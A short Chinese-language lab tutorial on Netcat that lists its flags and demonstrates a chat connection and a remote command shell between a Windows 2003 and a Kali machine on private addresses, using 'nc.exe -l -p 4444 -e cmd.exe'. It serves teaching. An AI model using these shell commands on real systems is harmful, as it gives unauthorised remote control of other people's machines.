使用Netcat实现通信和反弹Shell

hazing 2020-05-19

一、概述

nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流

可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp

-v 参数,详细输出

-n参数,netcat不要DNS反向查询IP的域名

-z参数,连接成功后立即关闭连接

-l参数 监听

-p参数 指定对应端口

-e参数 指定对应的应用程序

?

二、实验环境

1.Win2003 IP:192.168.0.107

2.kali linux IP:192.168.0.108

?

三、实验演示

?

建立C-S连接

?

  1. 在win2003中执行nc.exe -l -p 4444

    在4444端口上监听

使用Netcat实现通信和反弹Shell

  1. 在kail中执行nc 192.168.0.107 4444

    连接目标机4444端口

    使用Netcat实现通信和反弹Shell

3.在kali(客户端)下输入语句,在win上就会接收到

使用Netcat实现通信和反弹Shell

使用Netcat实现通信和反弹Shell

?

?

通过NC反弹shell

?

  1. 在win下执行 nc.exe -l -p 4444 -e cmd.exe

使用Netcat实现通信和反弹Shell

?

  1. kali执行 nc 192.168.0.107 4444

连接后可以看到win返回过来一个shell

使用Netcat实现通信和反弹Shell

?

相关推荐